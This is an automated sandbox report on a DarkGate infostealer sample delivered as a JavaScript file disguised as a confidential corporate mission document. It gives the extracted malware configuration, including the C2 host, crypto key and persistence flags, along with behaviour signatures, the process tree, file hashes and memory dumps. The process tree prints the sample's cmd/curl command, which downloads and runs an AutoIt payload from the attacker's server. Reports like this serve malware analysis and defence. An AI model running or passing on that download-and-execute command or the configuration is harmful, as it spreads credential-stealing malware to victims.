Analysis

  • max time kernel
    175s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2023 19:37

General

  • Target

    Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js

  • Size

    49KB

  • MD5

    c19568c51692a5b4dbfc29c02fafcf8d

  • SHA1

    b265c4f15c591a241d19c7284efeeb1e73407df0

  • SHA256

    c8c425368b40c30a09a8e4990e53a1df4c29493ad138287493da0d6f56f1dade

  • SHA512

    329efccd2808ffd1ee7c6e741890aad2ee22705bd0c2703a11f054e6d29520964c39edfb039cf3834c0e23990994b95748edb74944fdfad1d8c78e5adc9b4dbc

  • SSDEEP

    768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Dxt7niEL:nAIMFFdYMxAcEQDFXL

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

Ricoc3

C2

http://hgfdytrywq.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    false

  • anti_debug

    false

  • anti_vm

    false

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    hpBBFgfpMQrScI

  • internal_mutex

    txtMut

  • minimum_disk

    100

  • minimum_ram

    4096

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    Ricoc3

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2408
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
      1⤵
        PID:2452
      • C:\Windows\system32\taskhostw.exe
        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
        1⤵
          PID:2568
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:3776
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:3872
            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
              1⤵
                PID:3712
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                1⤵
                  PID:3556
                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
                  1⤵
                    PID:756
                  • C:\Windows\system32\wscript.exe
                    wscript.exe C:\Users\Admin\AppData\Local\Temp\Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
                    1⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:2292
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb & Autoit3.exe sejtnt.au3
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4396
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:1836
                        • C:\Windows\system32\curl.exe
                          curl -o Autoit3.exe http://hgfdytrywq.com:80
                          3⤵
                            PID:3824
                          • C:\Windows\system32\curl.exe
                            curl -o sejtnt.au3 http://hgfdytrywq.com:80/msizjphqffb
                            3⤵
                              PID:2560
                            • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
                              Autoit3.exe sejtnt.au3
                              3⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:1500
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c ping 127.0.0.1
                                4⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Blocklisted process makes network request
                                • Drops startup file
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1812

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\fghhgdf\Autoit3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\ProgramData\fghhgdf\ehbdbhb\baecfbe

                          Filesize

                          166B

                          MD5

                          830abc0db26445a45a21cf4c8f6b3979

                          SHA1

                          1f476e3f0d7a8be4297767777bd70fccead13f98

                          SHA256

                          625b328d8d7f789cb6b4bbe8aea1373d3accc6274d2838bfcf92af6ec9b61ac6

                          SHA512

                          c441f5a6776ba7d9a609d253c221568ec25b8bcac1ae0e0bd66fbb8feaa1b51b1c89207b0d57c354b7dc64e0a0bba888c38f6276a8e014c473a93fcb3652e97e

                        • C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

                          Filesize

                          872KB

                          MD5

                          c56b5f0201a3b3de53e561fe76912bfd

                          SHA1

                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                          SHA256

                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                          SHA512

                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                        • C:\Users\Admin\AppData\Local\Temp\sejtnt.au3

                          Filesize

                          487KB

                          MD5

                          4c5474759bd10c4fd072e73ae027b733

                          SHA1

                          6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                          SHA256

                          be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                          SHA512

                          b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                        • \??\c:\temp\eebhfbe.au3

                          Filesize

                          487KB

                          MD5

                          4c5474759bd10c4fd072e73ae027b733

                          SHA1

                          6b8c6dcd7f1e7043a734e8b5c6168ffb8c1d599e

                          SHA256

                          be1018a311679d697282aa5165018548e84bc31407cffe6764992f4ee0a73a46

                          SHA512

                          b88205551eff94b46b322219ae10ec62cedcc14302f1462546c0b32f34341d18a8c7a985918e4b4a4daf0e8c986e8fc7f23df842d84b42622871aee75c24609d

                        • memory/1500-6-0x0000000001A40000-0x0000000001E40000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/1500-8-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1500-15-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1500-16-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1500-18-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1500-17-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1500-19-0x0000000001A40000-0x0000000001E40000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/1500-22-0x0000000004CF0000-0x0000000005022000-memory.dmp

                          Filesize

                          3.2MB

                        • memory/1812-53-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-62-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-23-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-25-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-29-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-30-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-31-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-33-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-34-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-35-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-36-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-42-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-43-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-44-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-45-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-46-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-48-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-47-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-49-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-50-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-51-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-52-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-20-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-56-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-55-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-57-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-59-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-60-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-61-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-21-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-63-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-64-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-65-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-66-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-68-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-67-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-69-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-70-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-71-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-72-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-73-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-74-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-75-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-76-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-77-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-78-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-80-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-81-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-82-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-85-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-84-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-86-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-87-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-88-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-89-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-90-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-91-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/1812-92-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB